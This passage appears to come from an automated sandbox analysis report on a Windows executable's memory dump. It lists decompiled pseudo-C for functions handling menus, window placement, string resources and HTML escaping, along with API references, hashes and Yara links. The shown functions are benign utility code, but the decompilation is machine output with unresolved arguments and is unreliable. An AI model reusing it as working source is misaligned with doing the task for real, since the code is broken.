				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
				_t111 = _t70;
				if(_t70 == 0) {
					_t70 = 0x40f454;
				}
				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
			}

0x0040228c
0x0040228c
0x00402295
0x0040229e
0x004022a5
0x004022aa
0x004022ac
0x004022ac
0x004022ae
0x004022b1
0x004022b7
0x004022c0
0x004022c0
0x004022c8
0x004022cd
0x004022d5
0x004022da
0x004022e0
0x004022e2
0x004022eb
0x004022e4
0x004022e4
0x004022e4
0x004022f0
0x004022f8
0x004022fd
0x00402305
0x0040230a
0x0040230c
0x0040230e
0x0040230e
0x00402316
0x0040231e
0x00402323
0x00402327
0x0040232c
0x0040232e
0x0040232e
0x00402336
0x0040233e
0x00402349
0x0040234a
0x0040234b
0x0040234c
0x00402358
0x0040235f
0x00402366
0x0040236d
0x0040238d
0x00402399
0x0040239d
0x004023a2
0x004023a3
0x004023a4
0x004023ad
0x004023af
0x004023b0
0x004023b5
0x004023c7
0x004023cc
0x004023d5
0x004023da
0x004023e4
0x004023e9
0x004023eb
0x004023ed
0x004023ed
0x004023ff
0x00402404
0x00402409
0x0040240e
0x00402410
0x00402412
0x00402412
0x00402433

APIs

SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
__aulldiv.LIBCMT ref: 0040239D
_snwprintf.MSVCRT ref: 004023B0

Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C

Strings

#A, xrefs: 00402299
%I64d, xrefs: 004023A4
#A, xrefs: 00402300
TRUE, xrefs: 004022E4, 00402327
FALSE, xrefs: 004022EB, 0040232E, 00402333
#A, xrefs: 004023DD

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
API String ID: 1007903050-2074899967
Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
				wchar_t* _v0;
				int _v4;
				int _t39;
				wchar_t* _t49;
				void* _t51;
				int _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E0040E340(0x404c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a58, 0, 0x2000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E0040699E(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t67 = _a24;
						_a8256 = 0;
						memset( &_a8258, 0, 0x2000);
						_t49 = wcschr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x412c34 =  *0x412c34 + 1;
								_t68 =  *0x412c34; // 0x0
								_t67 = _t68 + 0x11558;
								__eflags = _t67;
							} else {
								_t67 = _v4 + 0x11171;
							}
						}
						_t51 = E00406D16(_t67,  &_a8256);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								wcscat( &_a8256, _v0);
								_pop(_t59);
							}
							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}

0x0040699e
0x004069a1
0x004069a9
0x004069b4
0x004069be
0x004069c2
0x004069c6
0x00406af3
0x00406af9
0x004069cc
0x004069d1
0x004069d8
0x004069dd
0x004069e4
0x004069f3
0x004069fe
0x00406a06
0x00406a0e
0x00406a1b
0x00000000
0x00000000
0x00406a26
0x00406acb
0x00406acb
0x00406acf
0x00406ad1
0x00406ad2
0x00406ad6
0x00406ad9
0x00406ade
0x00406ade
0x00000000
0x00406acf
0x00406a2c
0x00406a3a
0x00406a42
0x00406a4e
0x00406a53
0x00406a5a
0x00406a5e
0x00406a63
0x00406a71
0x00406a77
0x00406a7d
0x00406a7d
0x00406a65
0x00406a69
0x00406a69
0x00406a63
0x00406a8c
0x00406a94
0x00406a95
0x00406a9b
0x00406aa9
0x00406aaf
0x00406aaf
0x00406ac5
0x00406ac5
0x00000000
0x00406ae1
0x00406ae1
0x00406ae5
0x00406ae9
0x00000000
0x004069d1

APIs

GetMenuItemCount.USER32 ref: 004069B4
memset.MSVCRT ref: 004069D8
GetMenuItemInfoW.USER32 ref: 00406A13
memset.MSVCRT ref: 00406A42
wcschr.MSVCRT ref: 00406A4E
wcscat.MSVCRT ref: 00406AA9
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 00406AC5

Strings

0, xrefs: 004069F3
6, xrefs: 004069FE

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402754, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402754(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x00402761
0x00402768
0x0040276f
0x00402771
0x00402779
0x0040277d
0x004027a7
0x004027a7
0x004027af
0x004027b0
0x004027b5
0x004027d2
0x004027b7
0x004027c4
0x004027cd
0x004027cd
0x004027b5
0x00402785
0x0040278d
0x00402793
0x00402796
0x00402796
0x00402799
0x004027a1
0x00000000
0x004027a3
0x004027a3
0x00000000
0x004027a3

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
#17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4

Strings

Error, xrefs: 004027B9
Error: Cannot load the common control classes., xrefs: 004027BE
InitCommonControlsEx, xrefs: 0040277F
comctl32.dll, xrefs: 0040275C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405B17, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00405b17
0x00405b2a
0x00405b2d
0x00405b34
0x00405b3a
0x00405b3c
0x00405b4f
0x00405b59
0x00405b60
0x00405b62
0x00405b62
0x00405b75
0x00405b7b
0x00405b86
0x00405b8a
0x00405b8c
0x00405b95
0x00405b96
0x00405b97
0x00405b9d
0x00405b9f
0x00405ba5
0x00405baf
0x00405bb0
0x00405bb1
0x00405bb4
0x00405bb4
0x00405b8a
0x00405bbb
0x00405bbe
0x00405bcd
0x00405bd4
0x00405bc0
0x00405bc0
0x00405bc0
0x00405bdb
0x00405bde
0x00405bf3
0x00405bf3
0x00000000
0x00405be0
0x00405be9
0x00405bee
0x00405bf1
0x00405bf5
0x00405bf7
0x00405bf9
0x00405bf9
0x00405c16
0x00405c16
0x00000000
0x00405bf1

APIs

GetSystemMetrics.USER32 ref: 00405B30
GetSystemMetrics.USER32 ref: 00405B36
GetDC.USER32(00000000), ref: 00405B43
GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
ReleaseDC.USER32 ref: 00405B62
GetWindowRect.USER32 ref: 00405B75
GetParent.USER32(?), ref: 00405B80
GetWindowRect.USER32 ref: 00405B9D
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBDA, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040DBDA(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040dbdf
0x0040dbe1
0x0040dbe3
0x0040dbe4
0x0040dbe4
0x0040dbeb
0x00000000
0x00000000
0x0040dbed
0x0040dbee
0x0040dc56
0x0040dc57
0x0040dc5c
0x0040dc5f
0x0040dc68
0x0040dc6c
0x0040dc6f
0x00000000
0x0040dc6f
0x0040dc78
0x0040dbf5
0x0040dbf9
0x0040dc07
0x0040dc24
0x0040dc33
0x0040dc4e
0x0040dc63
0x0040dc67
0x0040dc50
0x0040dc50
0x0040dc51
0x00000000
0x0040dc51
0x0040dc35
0x0040dc35
0x0040dc37
0x00000000
0x0040dc37
0x0040dc26
0x0040dc26
0x0040dc28
0x0040dc3c
0x0040dc3d
0x0040dc42
0x0040dc45
0x0040dc45
0x0040dc09
0x0040dc11
0x0040dc16
0x0040dc19
0x0040dc19
0x0040dbfb
0x0040dbfb
0x0040dbfc
0x00000000
0x0040dbfc
0x00000000
0x0040dbf9

APIs

memcpy.MSVCRT ref: 0040DC11
memcpy.MSVCRT ref: 0040DC3D
memcpy.MSVCRT ref: 0040DC57

Strings

<br>, xrefs: 0040DC51
>, xrefs: 0040DBFC
°, xrefs: 0040DC28
<, xrefs: 0040DBEE
", xrefs: 0040DC0B
&, xrefs: 0040DC37

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F

Uniqueness

Uniqueness Score: -1.00%

Function 00406827, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00406827(signed short __ebx) {
				signed int _t21;
				void* _t22;
				intOrPtr _t23;
				struct HINSTANCE__* _t25;
				signed int _t27;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				void* _t35;
				signed short _t39;
				signed int _t40;
				signed int _t42;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;
				void* _t72;
				void* _t73;

				_t39 = __ebx;
				if( *0x413288 == 0) {
					E00406785();
				}
				_t40 =  *0x413280; // 0x18
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(1) {
						_t55 =  *0x413278; // 0x8c70a0
						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
							break;
						}
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t52 =  *0x41327c; // 0x8c74a8
					_t53 =  *0x413270; // 0x2080048
					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x412c38 == 0) {
							_t23 =  *0x413290; // 0x1000
							_push(_t23 - 1);
							_push( *0x413274);
							_push(_t39);
							_t25 = E0040698D();
							goto L15;
						} else {
							wcscpy(0x412e48, L"strings");
							_t35 = E00406D16(_t39,  *0x413274);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_t46 =  *0x413290; // 0x1000
								_push(_t46 - 1);
								_push( *0x413274);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x413274);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_t49 =  *0x413290; // 0x1000
						_push(_t49 - 1);
						_push( *0x413274);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40f454;
					} else {
						_t27 =  *0x413284; // 0xcd
						_t10 = _t61 + 2; // 0xcf
						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
						if(_t72 >= 0) {
							goto L20;
						} else {
							_t42 =  *0x413280; // 0x18
							_t73 = _t42 -  *0x41328c; // 0x100
							if(_t73 >= 0) {
								goto L20;
							} else {
								_t43 =  *0x413270; // 0x2080048
								_t57 = _t43 + _t27 * 2;
								_t14 = _t61 + 2; // 0x2
								memcpy(_t57,  *0x413274, _t61 + _t14);
								_t30 =  *0x413280; // 0x18
								_t44 =  *0x413284; // 0xcd
								_t54 =  *0x41327c; // 0x8c74a8
								 *(_t54 + _t30 * 4) = _t44;
								_t31 =  *0x413280; // 0x18
								_t45 =  *0x413278; // 0x8c70a0
								 *(_t45 + _t31 * 4) = _t39;
								_t32 =  *0x413284; // 0xcd
								 *0x413280 =  *0x413280 + 1;
								 *0x413284 = _t32 + _t61 + 1;
								if(_t57 != 0) {
									goto L21;
								} else {
									goto L20;
								}
							}
						}
					}
				}
				return _t22;
			}

0x00406827
0x0040682e
0x00406830
0x00406830
0x00406835
0x0040683c
0x00406841
0x00406853
0x00406853
0x00406843
0x00406843
0x00406843
0x0040684c
0x00000000
0x00000000
0x0040684e
0x00406851
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406851
0x00406880
0x00406889
0x0040688f
0x0040688f
0x00406855
0x00406857
0x00406988
0x00406988
0x0040685d
0x00406863
0x0040689c
0x004068eb
0x004068f1
0x004068f2
0x004068f8
0x004068f9
0x00000000
0x0040689e
0x004068a8
0x004068b4
0x004068b9
0x004068be
0x004068d2
0x004068d4
0x004068da
0x004068e1
0x004068e2
0x004068e8
0x00000000
0x004068c0
0x004068cb
0x004068d0
0x00000000
0x00000000
0x004068d0
0x004068be
0x00406865
0x00406866
0x0040686c
0x00406873
0x00406874
0x0040687d
0x004068fe
0x00406905
0x00406907
0x00406907
0x00406909
0x00406981
0x00406981
0x0040690b
0x0040690b
0x00406910
0x00406914
0x0040691a
0x00000000
0x0040691c
0x0040691c
0x00406922
0x00406928
0x00000000
0x0040692a
0x0040692a
0x00406930
0x00406933
0x0040693f
0x00406944
0x00406949
0x0040694f
0x00406955
0x00406958
0x0040695d
0x00406963
0x00406966
0x0040696e
0x0040697a
0x0040697f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697f
0x00406928
0x0040691a
0x00406909
0x0040698c

APIs

GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
wcscpy.MSVCRT ref: 004068A8

Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37

wcslen.MSVCRT ref: 004068C6
GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819

Strings

strings, xrefs: 0040689E

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00406050, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406050(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t52);
					_push( *((intOrPtr*)(_t52 - 4)));
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040DFD6();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x0040605b
0x0040606a
0x00406071
0x00406079
0x0040607c
0x0040607f
0x00406082
0x00406089
0x00406089
0x00406091
0x00406094
0x00406099
0x0040609e
0x0040609f
0x004060ab
0x004060b0
0x004060c3
0x004060cd
0x004060d1
0x004060d6
0x004060e4
0x004060ec
0x004060ef
0x004060f2
0x004060f2
0x004060f5
0x004060f5
0x004060fb
0x004060fe
0x00406102
0x0040610c

APIs

memset.MSVCRT ref: 00406071
_snwprintf.MSVCRT ref: 0040609F
wcslen.MSVCRT ref: 004060AB
memcpy.MSVCRT ref: 004060C3
wcslen.MSVCRT ref: 004060D1
memcpy.MSVCRT ref: 004060E4

Strings

%s (%s), xrefs: 00406094

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406F88, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040E340(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040E03E();
					if(_t26 != 0) {
						E00406E5E(_t34,  &_v8712);
					}
				}
				return 1;
			}

0x00406f90
0x00406fa6
0x00406fad
0x00406fb8
0x00406fbe
0x00406fcf
0x00406fd7
0x00406fef
0x00406ff6
0x0040700d
0x00407013
0x00407019
0x0040701e
0x0040701f
0x00407028
0x00407032
